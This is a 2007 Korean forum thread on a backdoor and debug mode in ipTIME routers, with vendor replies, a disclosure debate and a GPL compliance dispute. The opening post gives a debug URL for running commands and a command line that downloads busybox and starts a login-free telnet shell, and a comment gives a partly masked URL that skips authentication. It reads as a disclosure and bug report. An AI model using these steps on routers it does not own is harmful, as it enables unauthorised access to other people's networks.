iptime 공유기의 셸 띄우기
1603
points
points
iptime 공유기의 백도어 & 셸 띄우기
----------------------------------------------------------------------
2007-06-22 21:27:12에 백도어를 패치한 새 펌웨어가 나왔습니다.
http://iptime.co.kr/zeroboard/iptime_bbs/view.php?id=notice&no=347
----------------------------------------------------------------------
백도어에 대한 내용은 피해자를 유발할 수 있으므로 삭제했습니다.
디버그 모드에 관한 내용은 유용할 거 같아서 일단 놔둘 생각입니다. 이 기능은 계속 있었으면 좋겠네요.
http://공유기주소/cgi-bin/timepro.cgi?flag=debug를 입력하면 이상한 놈이 나옵니다.(최신버전은 debug 대신 bluesky입니다..)
리눅스 명령어를 실행할 수 있습니다.(약간 불편하네요)
여기서 http라는 wget와 비슷한 역할을 하는 프로그램을 찾아서 busybox를 올린 뒤(내장 busybox는 기능이 얼마 없더군요)
busybox에 들어있는 telnetd를 이용하여 putty로 접속했더니..
셸을 띄울 수 있었습니다.
/sbin/http get http://서버/busybox > /tmp/busybox & /tmp/busybox telnetd -l /bin/sh 2> /tmp/log &
이렇게 입력하면 텔넷 데몬이 가동되어 접속할 수 있습니다(내부 네트웤에서만 가능합니다).
이런.. 글을 수정하니 메인으로 올라가네요.. 죄송합니다.
| 첨부 파일 | 파일 크기 |
|---|---|
| x305_dbg.JPG | 54.87 KB |
| x305_shell.JPG | 75.42 KB |
| busybox.gz | 323.47 KB |
»
- 인쇄에 적합한 버전
- Login or register to post comments
- 17572번 읽힘
points
iptime q104 (버전 2.50)
iptime q104 (버전 2.50) 을 갖고 있는지라 해봤습니다.
처음에 로그인 화면이 나오기에 안 되는 줄 알았습니다만 비밀번호 없이 그냥 들어가네요.
쉘로 접속하는 건 윈도우 환경이라 못 해봤습니다만.
신기하네요.
그런데 혹시 iptime 에서 뭐라고 하지 않을런지.
points
흠 재미있겠군요. x304
흠 재미있겠군요. x304 였던가를 가지고 있는데 집에가서 해 봐야 겠습니다. (T.T 이시간에 회사에서 머하는 거지 --) 해 보고 리포팅 올리죠 :-)
points
로그인 암호가 걸려있으면 항상 암호를 물어보는군요
보안허점이라고 할 필요는 없겠습니다
IP Time IIe ver 1.70에서 시험했습니다
points
제 g104 에서도
제 g104 에서도 마찬가지로 비밀번호를 물어보네요.
--
오랫동안 꿈을 그리는 사람은 그 꿈을 닮아간다...
http://mytears.org ~(~_~)~ 나 한줄기 바람처럼..
points
?????를 그대로 입력했는데 그게 아닌가 보군요
찾아서 다시 해봐야겠네요
----------------------
찾아서 다시해보니 저도 마찬가지로 그냥 들어가는군요
points
보안에 문제가 있는 것 같은데요?
http://IP:1234/????/timepro.cgi?tmenu=main_frame&smenu=main_frame
로그인 암호 걸려있어도, 인증 절차없이 바로 시스템 셋팅 화면이 나옵니다.
1234는 port-번호, ????는 위의 이미지에서 가려진 글.
외부에서 공유기의 설정을 바꿀 수 있게 셋팅하면 (이 때, port번호 정하죠)
위의 경로로 접근시 인증절차 없이 바로 셋팅 화면이 나옵니다.
[니 칼은 니가 갈아라]
points
네 맞습니다.
아주 치명적이네요..
points
그러네요.
원래는 아랫그림 오른쪽처럼 로그인하도록 만드어야 하는데 특정주소로 접속하면 무제한 셋팅화면 접속가능...
iptime g104
points
iptime q/a 게시판
iptime q/a 게시판 가보니 이미 어느분께서 신고를 하셨더군요.
오늘날짜로 펌웨어 릴리즈가 된다는 소리가 있습니다.
http://iptime.co.kr/zeroboard/iptime_bbs/view.php?id=qna&page=2&sn1=&div... http://iptime.co.kr/zeroboard/iptime_bbs/view.php?id=qna&page=1&sn1=&div...
http://kkanari.egloos.com/
points
...
그동안 어디 가서 iptime 무선 공유기 있으면 몰래 잘 썼었는데...
무용지물 됐군요 -_- T.T
---------
귓가에 햇살을 받으며 석양까지 행복한 여행을...
웃으며 떠나갔던 것처럼 미소를 띠고 돌아와 마침내 평안하기를...
- 엘프의 인사, 드래곤 라자, 이영도
즐겁게 놀아보자.
http://akpil.egloos.com
하하...
저도 조용히 잘쓰고 있었는데...
sj316님 및 이 글을 보시는 분들께.
안녕하세요. ipTIME 입니다.
우선 ipTIME 사용자분들께 제품의 보안과 관련한 걱정을 끼쳐 드린 점 죄송합니다.
관련 보안 문제는 금일(2007.06.22)중으로 해결한 펌웨어를 iptime.co.kr에서
공식적으로 배포될 예정입니다.
현재 등록된 글은 선의의 피해자를 유발할 수 있는 여지가 있습니다.
그렇기 때문에 글을 등록하신 sj316님께서는 조속히 해당 게시물을 삭제해 주셨으면 합니다.
또한 해당 게시물을 보시는 다른 분들도 관련 게시물을 배포하는 일은 금지해 주셨으면 합니다.
감사합니다.
points
본 내용은 해당 벤더
본 내용은 해당 벤더 입장에서는 상당히 민감한 부분입니다. 해당 벤더에서 저에게 본 게시물 삭제를 요청해 왔는데 어떻게 하는 것이 좋을지요? 그리고 보통 security 관련 문제는 어떻게 논의되는가요? 제가 봤을때 이것은 억지로 해킹을 하는 것이 아니고 명백히 잘못 작성된 app의 버그 리포트라고 보는 것이 더 가까울 듯 한데...
points
보안관련 버그
보안관련 버그 리포팅의 경우, 만일 오픈 소스라면 널리 알릴수록 빠른 해결책이 나올 수 있겠습니다만, 그렇지 않은 경우엔 조용하게 처리하는 것이 피해의 규모를 줄일 수 있습니다. 삭제하실 필요까지는 없고 새로운 펌웨어가 나올 때 까지 잠시 글타래를 감춰 두시면 될듯합니다.
그러나 해결책(새로운 펌웨어)이 나오면 글을 지우는 건 의미가 없습니다. 해결책이 나온 경우에는 오히려 문제가 발생했음을 최대한 알리고 그 해결책을 같이 제공하는 것이 피해를 줄이는 최선의 방법입니다. 알아보기 쉽도록 원글 바로 아랫 부분에 새로운 펌웨어의 링크를 큼지막하게 달아 주는 것이 좋을 것 같습니다.
그리고, 버그가 아니라 백도어라는 것이 문제가 될듯 합니다. 실수로 남겨진 것이건 사후관리를 위해 남겨진 것이건 버그와는 달리 의도적으로 만든 것이니까요. 제작사의 책임있는 반응을 기대합니다.
왜 삭제를 합니까?
오히려 소비자는 사과를 받거나 금액 보상을 받아야 할 듯 한데요...
points
이미 접속경로부분을
이미 접속경로부분을 다 ???? 처리 했네요.
남겨놓는것에 한표 합니다.
emerge money
http://wiki.kldp.org/wiki.php/GentooInstallSimple - 명령어도 몇개 안되요~
points
글을 잘 읽어 보면
글을 잘 읽어 보면 찾는데 그리 어렵지 않네요 :-)
points
제 주변에도 ipTime
제 주변에도 ipTime 공유기가 많아서 시도해 보려고 했는데, 접속을 어떻게 해야 할지 이 글만 가지고는 도저히 유추할 수 없겠더군요. 선의의 피해를 주려고 해도 도저히 어떻게 줘야 할 지 모르겠습니다. 벤더 입장에서 이미지 손상이 우려된다면, 이런 버그가 있었는데 발견되고 나서 얼마 안 지나서 고쳐졌다는 식으로 이야기하면 안 될까요?
---- 절취선 ----
http://blog.peremen.name
points
남겨두는데 한표.
글 올리신 분이 나쁜 의도로 올리신 것도 아니고, 문제될 수 있는 부분은 미리 지우고 글 올리셨고..
훌륭한 bug-reporting 아닌가요? (test & result)
[니 칼은 니가 갈아라]
points
저도 처음엔
저도 처음엔 아이디/암호를 물어봐서, 별거 아닌줄 알았더니, 글만 자세히 읽어보고 따라하면 충분히 url 을 도추할 수 있더군요. 악의적인 쓰레드는 아닌것 같습니다. 위험한 글이긴 한데, 훌륭한 버그레포트에 한표 던집니다.
http://kkanari.egloos.com/
!!!! [ipTIME 보안 패치] 게시물과 관련한 문제점을 해결한 펌웨어를 배포합니다.
안녕하세요. ipTIME 입니다.
게시물과 관련한 문제점을 해결한 펌웨어를 배포합니다.
펌웨어는 http://www.iptime.co.kr 에서 다운로드 받으 실 수 있습니다.
감사합니다.
악용할 소지가 충분한데..
ID나 외부 접속 포트번호, 패스워드도 물어보지 않고 어떻게 A/S를 원격으로 쉽게 하나 했더니 관리용 백도어가 존재 했던거군요.
debug모드로 접속만 몰랐다면 저렇게도 접속이 가능하구나 할텐데.
debug 모드로의 접속 부분 때문에 이것저것 해볼 수가 있더군요.
올리는 사람이 나쁜 의도로 올리는건 아니지만 사용하는 사람이 나쁜 의도로 사용할 여지가 있을듯 합니다.
EFM networks측은 엄청난 a/s에 시달릴 수도 있는 부분입니다.
이미 퍼졌을 꺼라 생각되지만 debug 모드 접속 부분은 삭제 되는게 좋을듯 하군요.
points
ipTIME pro G54 2.50 -> 2.52
ipTIME pro G54 2.50 -> 2.52 업그레이드하고, 테스트해봤더니
접속안되네요 ㅎㅎ (테스트 완료)
http://kkanari.egloos.com/
points
X1005 1_26버전
x1005 패치(?)하고 위의 방법으로 접속이 안되는군요. 안심하고 퇴근해야 겠습니다. ㅡoㅡ
여담이지만.. debug 모드로 접근해서 파일 생성/삭제도 되더군요. 후덜덜;
[니 칼은 니가 갈아라]
points
그런데.. 맨처음 어떻게 알아 내셨는지 궁금하네요.
그런데. 맨처음 어떻게 알아 냈는지 궁금 하네요.
글이 수정되기 전에 펌웨어를 뜯어 본다고 말씀 하셨는데.
어떤 방법으로 분석 하셨는지 살짝 궁금하네요.
임베디드 분야에서는 경험이 없어서 이런 부분은 궁금하네요.
points
펌웨어에 redboot,
펌웨어에 redboot, 커널, initrd, cramfs가 박혀 있더군요.
그래서 조각내서 각각 파일로 나눈다음에 열어봤습니다.
윽... 바로 위에 답글에 답글을 달았어야 되는데... 삭제하고 다시 쓸려니 삭제가 없네요..
이진 파일을
이진 파일을 열어봐서 분석했다는 말씀이신가요?
아니면 분석툴이 따로 있나요?
points
PC에서 인식 가능한
PC에서 인식 가능한 filesystem인경우엔(cramfs라 고하셨으니깐 충분히 가능하겠네요..)...
예전 경험상 펌웨어에서 root filesystem을 떼어낸 후 PC에 mount해보면 PC에서 바로 보입니다.
펌웨어에서 filesystem만 떼어내는건... 펌웨어에 filesystem부분이 대부분 4KByte단위로 붙여져 있어서... filesystem magic을 찾아보면 쉽게 찾아집니다.
points
펌웨어 업그레이드하다...
펌웨어 업그레이드 하다가 이상하게 종료되서 인터넷이 먹통됬었습니다.
이걸 업체로 보내야 하나 마나 고민하다가 펌웨어 업그레이드 프로그램 받아서 실행해 봤지만
인터넷이 연결되있어야 한다고 해서 또 좌절했다가...
자포자기의 심정으로 브라우저를 오프라인 상태로 변경한담에 캐시된 펌웨어 업그레이드 페이지를
찾아서 다시 파일지정하고 오프라인 풀고 버튼을 눌러봤더니 업그레이드가 완료되고
인터넷도 정상 복구 되었습니다.
혹시 다른분들도 이런경우 있을까봐 적어둡니다.(참고로 제 공유기는 Q104입니다.)
points
저도 ipTIME VE에서 v2.52로 업데이트 후 문제가 생겼는데
되는지 한번 해봐야겠군요.
공유기 가격도 2만원대로 떨어졌고 3년 넘게 쓴 물건이라
A/S를 보내야하나 말아야하나 진짜 갈등 생기네요 ㅋ^^
points
구멍 뚫린 펌웨어는
구멍 뚫린 펌웨어는 업체 입장에선 쉬쉬할수 밖에 없습니다.
알려질수록 회사 이미지에 타격을 주니까요.
제가 더 관심을 가지고 있는 문제는 다른겁니다.
iptime 공유기는 리눅스 커널을 쓰면서도 사용한 커널은 공개하지 않고 있습니다.
예전에 www.iptime.co.kr 에 가서 iptime 구매자인데 커널을 공개하라고 그랬더니
침묵으로 일관하더군요.
제가 보기엔 언젠간 리눅스 커널 개발자들한데 소송걸리고 크게 데일것 같은데 말이죠. --;
points
소송을 대행해주는
소송을 대행해주는 업체가 있었던거 같던데...
예전 회사에서 그들(?)에게 심히 당한적이 있어서...
GPL을 사용하는데 대한 비용절감으로 의무조항에 조금만 투자해도 될텐데 말이죠...
points
흠.. 생각해 보니
흠.. 생각해 보니 그렇군요. WDS 로 구성해서 사용중에, WDS 하위 공유기가 gateway 를 타고 나가지 못하는 문제가 있어서 고쳐달라고 했더니 못 고쳐 준다고 했었는데, 실제 공개가 될 수 있다면 그냥 쉘 띄어서 routing table 수정하면 되는 문제가 해결되는 거였군요.
전화로 문의해 봐야 겠어요 ^^;
지금 이 문제 때문에 WDS 하위 공유기는 업데이트를 하지 않고, shell 로 routing table 수정해서 사용하고 있습니다. :-)
마이서버 커널도 공개 않해 줍니다.
마이서버 커널도 공개 않해 줍니다.
리눅스 커널에 busybox 까지 사용하는 거면
완전한 공개 의무를 가지고 있는 거 아닌가요?
그리고는 회사에서는 방치 & 무시 상태입니다.
points
해당 제품이 리눅스
해당 제품이 리눅스 커널 & 기타 GPL 소프트웨어 등 소스코드 공개를 포함한 별도의 의무사항이 발생하는 SW를 사용했다는 증거가 있나요? 만약 그렇다면 심각한 이슈가 될 수 있습니다.
points
debug mode 에서 uname 을
debug mode 에서 uname 을 해 보면 Linux 2.4.18 이라고 나옵니다. :-) linux kernel 을 사용했다는 얘기죠. 또는 strings 로 firmware 를 봐도 Linux uncompress 라는 문자열을 찾을 수 있습니다. vmlinuz 가 올라가고 압축을 해제할 때 나오는 메시지죠.
points
web-server p/g, boa
공유기내 프로그램 설정파일중 boa_XX.conf라는 것이 있던데, 이것으로 유추해 보아 임베디드 시스템에서 많이
사용되는 web-server p/g, boa를 쓰는 것 같네요. 라이센스는 GPL이군요.
http://www.boa.org http://www.boa.org/documentation/boa-4.html#ss4.1 [니 칼은 니가 갈아라]
points
사건 터진 제품군만
사건 터진 제품군만 자알 처리해서 넘어가려고 하고 있으신건지 아니면 실수로 빼먹으신건지는 모르겠지만, 다른 제품군도 어서 수정해주시기 바랍니다.
points
이 글 뒤늦게 보고
이 글 뒤늦게 보고 공유기 접속해서 펌업했는데 2.50 으로 업됐습니다. 이걸로 해결된건가요? 2.52 쓰는분들은 어떻게 하신건지..
ps, iptime 사이트 가보니 자동업뎃은 26일 이후에 지원하다고 하는군요. 원격 관리 옵션만 꺼두면 일단은 안심해도 되는건가요? 꺼둔채로 사용중이었는데..
points
수동업데이트 받는
수동업데이트 받는 곳 들어가서 2.52 버전 롬파일 받은 뒤에
공유기 설정메뉴(웹브라우저에서 아이피 치는것)로 들어가면 관리자 메뉴에 롬파일 업로드해서 업데이트 하는 옵션이 있습니다.
26일 이후에 자동업데이트로 하셔도 됩니다.
2.50은 아직 패치되지 않은 버전입니다.
points
저도 집에 가서
저도 집에 가서 확인해 보아야겠네요..
???? 는 다른 것이라고요..
쉽게 찾으려나 모르겠네요.. ㅎㅎ
points
ipTIME 입니다. sj316님 보세요.
sj316님이 찾아주신 백도어 방법이 실제로 존재하며 이는 당사의 어떠한 악의적인 목적이 아닌 프로그램 작성 시 실수로 발생한 것입니다.
자세한 설명을 드리자면 공유기 기능중 네트웍크 감시 기능(웜 바이러스 감시 기능, network detector : ND)을 구현함에 있어 발생한
보안상의 버그로 인한 백도어입니다.
네트워크 감시 기능에서는 공유기와 연결된 PC에서 웜바러스의 활동이 감시되는 경우에 해당 PC 사용자에게 관련 정보를 알려주기위하여
자동으로 네트워크 감시 레포트 페이지로 리디렉션 시키는 기능이 있습니다. 이때 공유기 관리 웹에 관리자 암호가 설정이 되어 있다면
레포트 페이지가 보여질 땜 마다 매번 관리자 암호를 물어 보게 되므로, 관리자 암호가 설정이 되어 있더라도 암호가 요구되지 않는 페이지로의
관리 웹 접속이 필요하여, 이를 구현하는 과정에서 프로그램 실수로 인하여 생긴 백도어 입니다.
본 내용은 sj316님이 찾아낸 PATH 정보를 보면 쉽게 유추해 낼 수 있을 것 입니다.
물론 당사는 sj316님의 공개로 인하여 있을 수 있는 보안상의 결함을 수정할 수 있게된 것에 대해서는 감사드리나,
본 게시글이 계속적으로 남아있는 경우 보안 패치가 적용되지 않은 상태로 공유기를 사용하시는 많은 당사 제품 사용자님들께
선의의 피해를 끼킬 수 있으므로 말씀하신 것과 같이 당 게시글을 삭제하여 당사의 제품을 사용하시는 여러 사용자님들을
보호해 주실 것을 다시 한번 부탁드립니다.
points
악의적으로 올린
악의적으로 올린 글은 아닙니다.
홈페이지에 백도어가 존재했었다는 사실을 올려주시는건 어려울까요??
그리고 명령을 실행할 수 있는 기능은 새 펌웨어에서도 남아있으면 좋을 거 같습니다.
별로 실현가능성이 없어보이지만 펌웨어를 오픈소스화 하실 계획은 없으신가요?
만약 오픈소스화한다면 얻게되는 장점들이 단점보다 훨씬 많을거라 생각합니다.
오픈소스화 하는 것을 를 꺼리는 이유가 기술 유출과 보안 문제때문이라면
오픈소스화해서 얻을 수 있는 신속한 패치와 기능, 안정성 향상 그리고 명예등으로 보완되지 않을까요?
답글 달아주시면 바로 삭제하겠습니다.(우선 방법만 삭제하겠습니다.)
points
홈페이지 공지 수정
당사 홈페이지 2007년 6월 22일자 공지사항에 보안관련 내용을 추가하여
백도어 존재 사실을 공지 하였습니다. 확인하시기 바랍니다.
향후 연락이 필요하시 다면 ysyoo@efm-net.com으로 연락주시면 됩니다.
빠른 삭제 부탁드립니다.
points
위에 리눅스 등 공개
위에 리눅스 등 공개 의무가 발생하는 소스코드들에 대한 내용도 빠른 시간 내에 대응해 주시기를 기대합니다.
points
이 글타래에서
이 글타래에서 '엠브리오'님이 gpl 의무사항 관련하여 글을 올리신 것이 6월 24일로서 벌써 일주일이 지났으나 관련해서 아무런 action이 없군요. 분명히 보았을 텐데 아무런 답변도 없고요.
오늘자 /.에 보니 parallel을 판매하는 swsoft가 lgpl 코드를 사용하였음에도 제대로 대응하지 않고 있다는 소식이 떴던데 (http://slashdot.org/article.pl?sid=07/07/01/0142248) 아무래도 다음 순서는 이 회사가 되지 않을까 합니다.
안타깝군요.
points
장사 한두번 하나요? ^^;
iptime에 커널 공개에 대해서 질문한 적이 하도 오래되서 언제인지 기억도 안납니다.
그 업체의 초창기였을때 이므로 적어도 3~4년 전이었을겁니다.
답변 할 생각이 있었다면 지금이 아니라 벌써 전에 있었겠지요.
백도어 문제가 나온김에 혹시나 싶어서 커널 공개 문제를 다시 한번 언급한것 뿐이지
사실 개인적으로 기대를 하지는 않았습니다.
문제가 커지기전에 미리 예방해 보자는게 목적이었으나 업체가 별 반응이 없으므로
저도 더 이상의 언급은 하지 않을 작정입니다.
업체로서는 기술유출 및 이윤과 직결되는 문제이므로 제가 더 문제를 확대하면
그 업체에서는 저를 "고추가루" 보듯이 할테고, "저 놈이 무슨 억하심정이 있어서 저러나 ?"
이런 확대해석을 할 수도 있습니다.
이 정도로 언급을 해주었는데도 담당자가 사태의 심각성을 느끼지 못한다면
그것이 그 회사의 한계이겠지요.
제 시각이 오늘도 이상하게 삐딱한 방향으로만 흘렀나 봅니다.
내일 당장 커널을 공개하겠다고 할지도 모르는데 말이죠. ^^;
그만 적어야 겠습니다.
points
이 글타래를 보고
이 글타래를 보고 있지 않을 수도 있겠죠. 요즘 라이센스 이슈에 대하여 고민들을 많이 하는지라 혹시 생각도 하지 못하고 있을 수도 있겠군요. iptimes home page 에 한번 올려 봐야 겠습니다. 공식적인 답변이 어떻게 나오는지..
points
http://iptime.co.kr/zeroboard
http://iptime.co.kr/zeroboard/iptime_bbs/view.php?id=qna&page=1&sn1=&div...
에 공식적으로 다시 문의를 해 놓았습니다. 막연한 추측등을 하지는 마시고, 위의 글타래에서 공식적인 답변을 받은 후에 대처를 하는 것이 맞지 않을까 싶습니다.
points
흠... 기다려 보지요.
흠... 기다려 보지요. 한가지 확실하게 말씀드릴 수 있는 것은 그 회사에서 이 글타래를 보고 있고, GPL관련 건도 아직 '검토' 중에 있다는 것입니다. 어떤 반응이 나오는지 한번 지켜 보겠습니다.
points
문제는 GPL 위반이 EFM
문제는 GPL 위반이 EFM networks 한 회사에 한정된 것이 아니라 국내 다수의 업체들이 마찬가지 모습을 보이고 있다는데 있습니다. 한 업체의 경우에 한정하여 생각할 것이 아니라, 좀더 앞을 내다보고 오픈소스를 활용하는 국내 기업과 사용자 집단 모두 이익을 볼 수 있도록 다같이 고민하여 방법을 찾아내는 것이 우선이라 생각합니다.
[아래는 혹시나 보고계실 오픈소스를 활용하는 기기 제작업체 분들에게 드리는 글입니다.]
지금은 일반 사용자들의 컴퓨터 활용 수준도 올라가고 인터넷의 보급으로 인해 고급 기술정보도 구하기 쉬운 세상입니다. 또한, 오픈소스에 대한 관심과 사용자들의 욕구도 늘어나고 있고 들리는 소식에 의하면 오픈소스 저작권자들의 법적대응도 빈번해지고 있는 것 같습니다. FTA로 인해 한미간 저작권 조항도 강화되는 마당에, 머지않아 의무 규정을 준수하지 않고는 오픈소스를 사용하기 힘든 시기가 올것입니다. 시기가 닥쳐 쫓기듯이 마지못해 공개를 하느니 지금부터 앞을 대비하며 바람직한 사용자 집단을 키워놓는 것이 좋지 않을까요? 관련 스레드를 열었으니 관심있는 분들의 많은 참여 바랍니다.
points
일단은 8월 정도에
일단은 8월 정도에 업데이트 되는 firmware 버전으로 공개를 하겠다는 답변이 왔네요. 다만 GPL'd 에 관련된 부분만 공개를 하겠으며, chipset 과 관련된 코드 부분은 제외될 수도 있다라는 단서 조항이 있습니다. 뭐 어쨌든 공개된 부분이 GPL 에 위반이 되지 않는다면 당연한 부분일 수도 있을 것이고요. 다만..
예를든다면 언급하신 하이온넷 사건의 판례에서는 GPL 기반 코드일지라도 영업 비밀의 대상으로 간주된 판례가 있었으며 당사 문제점을 제기하신 K*사이트의 관계자님 중에서도 국내 모 대기업에서 생산되는 많은 리눅스 기반 제품의 커널 관련 소프트웨어 작업을 하고 계신 것으로 알려져 있으나 실제로 이에 대한 공개는 없었던 것으로 알고 있어 당사의 결정을 어렵게 하였습니다. 즉 대기업의 GPL 관련 위반은 영업비밀 유지며 당사와 같이 미약한 중소기업에만 이와 같은 규칙이 엄격하게 적용되어서는 불합리하다는 점을 마지막으로 말씀드리고자합니다.와 같이 "영업비밀" 에 대한 부분은 아직도 애매한 사항인 것 같습니다. 하이온넷 사건이 "영업비밀"을 인정한 것으로 종료가 된 것인지 궁금하군요. 제가 마지막으로 보았던 부분에서는 아직 결론이 안났었던 것으로 기억이 나는데, 해당 글을 찾지를 못하겠네요.
FSF 의 공식 입장은 "영업비밀"을 인정하지 않는다는 분위기 인듯 싶은데, 대다수의 회사들은 "영업비밀" 이 하이온넷 판례로 보아서 인정이 된다고 생각을 하고 있는 것 같습니다.
points
대략
http://korea.gnu.org/gv/evh.html
판결문 내용을 보시면
이상의 사실관계를 종합할 때, 피고인 한oo, 박oo이 유출, 사용한 ETUND는 비록 공개된 소프트웨어인 VTUND를 기반으로 개발된 것이라 하더라도 엘림넷에 의하여 중요한 기능이 개량 내지 향상되었을 뿐 아니라, 비밀로 유지, 관리되고 있는 기술상의 정보로서 일반적으로 알려져 있지 아니한 것임이 분명하고, 영업비밀로 보호받을 독립된 경제적 가치 또한 충분히 인정된다 할 것이며(피고인 한oo 스스로도 검찰에서 ETUND 중 새로운 아이디어가 추가된 부분은 엘림넷의 소유라고 생각한다고 진술하였고, 피고인 박oo도 검찰에서 엘림넷의 기술을 이용한 것이 개발기간을 2개월 정도 단축한 효과는 있다고 진술하였음), 이른바 오픈소스 운동을 전개하고 있다는 자유소프트웨어재단의 GPL 라이센스 규칙이 이 사건에 있어서 어떠한 법적 구속력이 있다 할 수 없으므로, 결국 피고인들의 주장은 이유 없다.
라던지;;
피고인들은 VPN 서비스업체 중 최신기술을 보유한 엘림넷의 기술상, 경영상, 영업비밀을 대거 유출하여 후발업체인 하이온넷의 VPN 사업에 사용함으로서 엘림넷의 존립 자체에 위해가 될 만한 범행을 저질렀고, 자유소프트웨어재단이라는 단체로 하여금 법원의 재판에 압력을 행사하도록 하였다는 점에서 엄벌에 처하여야 마땅함.
라던지;;
이후 가처분 신청건을 통해서는
피신청인측 프로그램과 ETUND 프로그램의 원시코드(source code) 대부분이 일치하는 사실이 기록상 소명되므로, 피신청인측 프로그램은 신청인의 주장과 같이, ETUND 프로그램의 일부 기능을 업그레이드한 것에 불과하다고 보이는데, 피신청인은 2005.8.10.부터 자신의 홈페이지 `www.haion.net'을 통해 피신청인측 프로그램의 원시코드를 공개하여 누구나 이를 다운로드 받을 수 있도록 한 사실이 기록상 소명되는바, 이와 같이 ETUND 프로그램과 원시코드가 대부분 일치하여 일부 기능을 개선한 데 불과한 것으로 보이는 피신청인측 프로그램의 원시코드가 공개된 이상, 신청인의 ETUND 프로그램 역시 비공지성을 상실하여 더 이상 영업비밀에 해당하지 않는다고 볼 여지가 크고, 또한 신청인이 영업비밀이라고 주장하는 `인터넷 다중회선을 통한 전송속도를 증속시키는 기술' 이라는 것은 ETUND 프로그램을 실행함으로써 얻을 수 있는 효과를 설명한 것에 불과하다고 보이며, ETUND 프로그램 이외에 신청인의 영업비밀에 해당한다고 볼만한 별도의 기술이 있다는 점에 대하여는 기록상 아무런 소명이 없으므로, `인터넷 다중회선을 통한 전송속도를 증속시키는 기술' 역시 신청인의 영업비밀에 해당한다고 보기 어렵다.
가 있으니 최종적으로는 영업비밀이라 하는것에 대한 인정을 하지 않는다는 것이 최종결론이 맞습니다만, 사람이라는것이 항상 그렇듯이 보고 싶은것만 보게 되니 이전의 사건 결과를 바탕으로 영업비밀 맞지 않느냐 라는 논리로 나오고 있는 경향이 좀 더 강하지 않나 합니다. 일단 유리한것만 보게 된 것이겠지요.
====================어흥====================
짖지마시고 말씀을 하세요.
points
예전에 본 건에
예전에 본 건에 대해서 현직 판사로 재직하시는 분과 이야기를 한 적이 있는데 본 건이 한국에서 GPL의 의무사항/준수사항들을 지키지 않아도 된다는 판례가 되는 것은 아니라고 들었습니다.
points
재미있군요. 남의
재미있군요. 남의 핑계만 대면서... 자기들은 억울하다? 만약 저 관계자가 저를 지칭하는 것이라면... 둘다 사실이 아닙니다. 무슨 근거로 제가 그 수많은 리눅스 기반 제품들의 커널 작업을 하고 있고, 실제 공개는 없었다고 이야기하는지 모르겠군요.
그리고 제가 몸담고 있는 회사에서는 GPL을 지킬 수 있도록 하기 위해 노력하고 있습니다. 확인하시기를 원하시는 분들은 제게 이메일(kss (골뱅이) kldp.org)을 보내 주시면 준수 사례를 알려 드리겠습니다. 특히, ipTimes 관계자 분들은 분명히 이 메시지를 보고 계실 테니 꼭 연락 주시기 바랍니다. 별도의 사용자 등록이 필요하거나 꼭꼭 숨겨진 장소가 아닌 외부에 공개된 장소에서 아주 쉽게 확인하실 수 있습니다.
points
공개 사례 알려주시면 감사하겠습니다.
당사는 본건의 의사 결정을 내리면서 찾을 수 있는 참고 자료의 너무 없었던 것 같습니다. 본 사이트에서도 찾을 수 있는 소스 오픈 예도 아이리버 PMP 플레이어 하나밖에 없었습니다 물론 저희가 찾기에 미흡했을 수도 있습니다. 이번 기회에 삼성 전자 뿐만이 아니라 권순선님이 알고 계신 국내 소스 오픈 사례를 전부 링크 걸어 주시면 저희 뿐만이 아니라 이번 건과 관련해서 관심 갖고 계신 많은 분들에게 큰 도움이 될 것 같습니다. 어차피 오픈된 내용인데 이렇게 공개하는 것이 더 좋지 않겠습니까?
points
죄송하지만 굳이
죄송하지만 굳이 제가 시간을 들여서 사례들을 찾아서 링크를 걸거나 하고 싶은 생각은 별로 없습니다.
명확한 근거없이 저나 제가 몸담고 있는 회사에 대해 오해를 살만한 이야기를 하시는데 그런 마음이 생길 리가 없지요.
검증해봅시다.
요즘 정치권에서도 검증 공방이 한창인데.
사례를 찾아서 링크를 걸어주는 것도 의미가 있을거 같습니다.
공개사례라....
http://www.u-stor.net/ 를 가보시면 OpenSource라는 코너가 있습니다. 사용한 프로그램 정보와 사용법등이 적혀 있습니다. QnA 코너도 있습니다.
iptime글을 보니 알면서도 공개를 안한 경우 아닙니까? 남이 공개를 안하니 나도 공개를 못하겠다?
애써서 만든 프로그램 공개하시는 훌륭한 분이 있는가 하면, 그 프로그램을 그냥 가져다 쓰고, 돈을 벌면서 공개를 못하겠다는 건 정말 이해할 수 없는 발상이군요.
더군다나 "전부" 라는 단어까지 쓴 걸 보니 전혀 공개할 의지가 없는 것 같습니다.
원본을 수정하면서 더 뛰어난 프로그램이 되었다면,
그 수정한 것도 공개를 못하겠다면,
그렇게 기술력이 뛰어나시면,
직접 다 만드시지 왜 다른 분이 애써 만드신 것을 거져 쓰시나요??
남의 라이센스는 무시하면서, 자신의 라이센스?(라이센스라 말할 수도 없지만..)는 그렇게 중대한 것입니까?
최소한의 양심은 가지셔야 하는 것 아닙니까? 남의 공개 사실 들먹거리면서 뻔뻔하게 기밀이라 하시는 것 보단요.. 노상방뇨를 했으면 최소한 누가 지적했을 때 잘못한 점을 시인하기나 해야 합니다.
혹, 공개사례를 알게되면, 그 제품 유사품 만들어 팔려는 것은 아니겠지요??
points
익명 사용자
[...]가 앞선나라라고 여기 저기에서 홍보물이 넘쳐나고 그 홍보물을 인용하는 사람들이 냉정한 비판적인 사고를 하지 않고 인용하고
인용하는 사용자도 증가하고 있습니다.
우리나라에 위의 인용된 회사처럼 하나, 둘... 알게 모르게 시간이 지나 많이 생겨 났으면 하는 바램입니다.
어느날 '어~! 하면서 많아 졌네. 언제 이렇게 많아졌지?' 라고 말을 하게 되는 그 날이 오면 좋겠습니다.
워낙 냄비(님비인가요?) 처럼 뭐가 좋더라~ 잘나간다~ 하면 우르르 몰려드는 성품을 원하든 원치않든 가지게된 우리나라[...]이니까요.
부연 : [...]은 빈칸을 채우시오. 형의 빈칸입니다. ;)
============================
나이가 들수록 사고가 마비되고 경직되는것을 경계해야 한다.
어린세대의 유연한 마음을 가져라.
그럼 틀에 박힌 사고의 틀이 깨질것이다.
ipTIME의 공식적인 답변이 올라왔군요
중간에 권순선님에 대한 이야기도(K*사이트의 관계자님이라 표현되어있지만) 잠깐 언급되어있군요.
원문 링크입니다.
http://iptime.co.kr/zeroboard/iptime_bbs/view.php?id=qna&page=1&sn1=&div...
points
GPL에 의한
GPL에 의한 소스공개냐 아니냐를 논하는데
'대기업 대 중소기업' 이라는 신기한 논리를 끌어들이시고 계시군요.
그 K모 사이트의 관계자가 대기업과 관련이 있다고 해도,
위를 보시면 아시겠지만 그 대기업을 대표하여 글을 쓰신 것이 아니죠?
